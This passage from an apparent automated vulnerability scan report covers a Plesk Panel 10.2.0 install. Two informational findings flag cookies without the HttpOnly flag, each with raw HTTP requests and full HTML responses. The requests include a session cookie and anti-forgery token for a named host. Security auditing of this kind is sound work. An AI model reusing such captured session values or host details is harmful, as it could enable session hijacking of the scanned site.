   <option value='Brazilian'>Brazilian</option>
   <option value='British English'>British English</option>
   <option value='Bulgarian'>Bulgarian</option>
   <option value='Croatian'>Croatian</option>
   <option value='Czech'>Czech</option>
   <option value='Danish'>Danish</option>
   <option value='Dansk'>Dansk</option>
   <option value='Deutsch'>Deutsch</option>
   <option value='Dutch'>Dutch</option>
   <option value='English'>English</option>
   <option value='Estonian'>Estonian</option>
   <option value='Finnish'>Finnish</option>
   <option value='French'>French</option>
   <option value='German'>German</option>
   <option value='Greek'>Greek</option>
   <option value='Hungarian'>Hungarian</option>
   <option value='Italian'>Italian</option>
   <option value='Japanese'>Japanese</option>
   <option value='Korean'>Korean</option>
   <option value='Latvian'>Latvian</option>
   <option value='Lithuanian'>Lithuanian</option>
   <option value='Magyar'>Magyar</option>
   <option value='Nederlands'>Nederlands</option>
   <option value='Norwegian'>Norwegian</option>
   <option value='Polish'>Polish</option>
   <option value='Portuguese'>Portuguese</option>
   <option value='Romanian'>Romanian</option>
   <option value='Russian'>Russian</option>
   <option value='Simplified Chinese'>Simplified Chinese</option>
   <option value='Slovak'>Slovak</option>
   <option value='Slovenian'>Slovenian</option>
   <option value='Spanish'>Spanish</option>
   <option value='Suomi'>Suomi</option>
   <option value='Svenska'>Svenska</option>
   <option value='Swedish'>Swedish</option>
   <option value='Thai'>Thai</option>
   <option value='Traditional Chinese'>Traditional Chinese</option>
   <option value='Turkish'>Turkish</option>
   <option value='Us_english'>Us_english</option>
</select>
</td>
</tr>

<tr>
   <td class="name">[OEMTOANSI] &nbsp;&nbsp;Conversion of extended characters to OEM values</td>
   <td><select name="OEMTOANSI" id="fid-OEMTOANSI" >    <option value='' SELECTED></option>
   <option value='437 code page'>437 code page</option>
   <option value='850 code page'>850 code page</option>
   <option value='ISO 8859-1'>ISO 8859-1</option>
</select>
</td>
</tr>














</table>



</td></tr></table></fieldset>

   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-next" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Check the currently defined settings.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);check_data(document.forms[0]);;return false;" style=""><BUTTON name="bname_next" id="buttonid-next" type="button" onClick="Event.stop(event);check_data(document.forms[0]);;return false;">Next &gt;&gt;</BUTTON><SPAN id="spanid-next">Next &gt;&gt;</SPAN></DIV>&nbsp;<SPAN class="commonButton" id="bid-finish-disabled" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;This feature is currently unavailable.&quot;&#125;]);" onMouseOut="tooltip.hide();" style=""><BUTTON name="bname_finish" disabled id="buttonid-finish-disabled" type="button">Finish</BUTTON><SPAN id="spanid-finish-disabled">Finish</SPAN></SPAN>&nbsp;<DIV class="commonButton" id="bid-test" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Try to connect to the data source with current parameters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);test_connection(document.forms[0]);;return false;" style=""><BUTTON name="bname_test" id="buttonid-test" type="button" onClick="Event.stop(event);test_connection(document.forms[0]);;return false;">Test Connection</BUTTON><SPAN id="spanid-test">Test Connection</SPAN></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); 
return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.33. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/odbc/dsn@new/properties/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/odbc/dsn@new/properties/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/odbc/dsn@new/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/odbc/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dsnlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:08:38 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:08:38 GMT
Connection: close
Content-Length: 13904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fcertificate%2540%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fmpc-certificates%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Add New ODBC DSN</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/odbc_dsn_add/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/odbc/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

function new_dsn(f)
{
   if (f.name.value == "") {
       alert("Enter DSN name");
       f.name.focus();
       return false;
   }
   if (!chk_dsn_name(f.name.value)) {
       alert("Wrong syntax for ODBC connection name (): please use only alphanumeric symbols.");
       f.name.select();
       f.name.focus();
       return false;
   }
   f.cmd.value = "update";
   lsubmit(f);
   return false;
}

// forbidden characters for dsn name: []{}(),;?*=!@
function chk_dsn_name(name) { return name.search(/^[A-Za-z0-9\-\_'\"\<\>\/\.\|\~\#\$\%\^\&]*$/) != -1; }

</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/odbc/dsn@new/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

   <legend>Add new DSN connection</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>
   
   <table class="formFields" cellspacing="0" width="100%">
       <tr >
           <td class="name"><label for="fid-dsn_name">Connection name</label>&nbsp;<span class="required">*</span></td>
           <td><input type="text" name="name" id="fid-dsn_name" value="" size="13" maxlength="32"></td>
       </tr>
       <tr >
           <td class="name"><label for="fid-dsn_desc">Connection description</label></td>
           <td><input type="text" name="description" id="fid-dsn_desc" value="" size="13" maxlength="32"></td>
       </tr>
       <tr >
           <td class="name"><label for="fid-dsn_driver">Driver</label></td>
           <td><select name="driver" id="fid-driver" >    <option value='SQL Server'>SQL Server</option>
   <option value='Microsoft Access Driver (*.mdb)'>Microsoft Access Driver (*.mdb)</option>
   <option value='MySQL ODBC 3.51 Driver'>MySQL ODBC 3.51 Driver</option>
   <option value='Microsoft Excel Driver (*.xls)'>Microsoft Excel Driver (*.xls)</option>
</select>
</td>
       </tr>
   </table>
   
</td></tr></table></fieldset>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return new_dsn(document.forms[0]);return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="button" onClick="Event.stop(event);return new_dsn(document.forms[0]);return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizstep" value="1"><input type="hidden" name="wizard" value="/plesk/client@2/domain@1/odbc/dsn@new/properties/"><input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.34. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/traffic-hosting

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/traffic-hosting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/traffic-hosting HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:15:03 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:15:02 GMT
Connection: close
Content-Length: 24895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Ftraffic-hosting%26src%3D%252Fsmb%252Fstatistics%26srcController%3DStatisticsController' + '&activeModule=' + 'statistics' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"active","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Data Transfer Statistics for Subscription vulnerable.host.fqdn</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.traffic-hosting/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=statistics.index/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/traffic-hosting" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <div class="listArea">
   <fieldset>
       <legend>Data transfer by services</legend>
       <table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>
       <script>
       function change_period_oC(f, new_date)
       {
           f.date.value = new_date;
           f.cmd.value = "changePeriod";
           lsubmit(f);

           return false;
       }
       </script><div id="DomainTrafficListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><input type="hidden" name="date" value="1304226000"><select name="date_selector" onChange="change_period_oC(document.forms[0], this.value); return false;"><option value="1304226000" SELECTED>May 2011 (0 B)</option></select></div></td><td class="misc"><div id="DomainTrafficListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);DomainTrafficListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);DomainTrafficListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);DomainTrafficListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);DomainTrafficListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div>
<table border="0" cellpadding="0" cellspacing="0">
   <tr>
       <td>Name</td>
       <td>&nbsp;</td>
   </tr><tr>
       <td><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></td>
       <td>
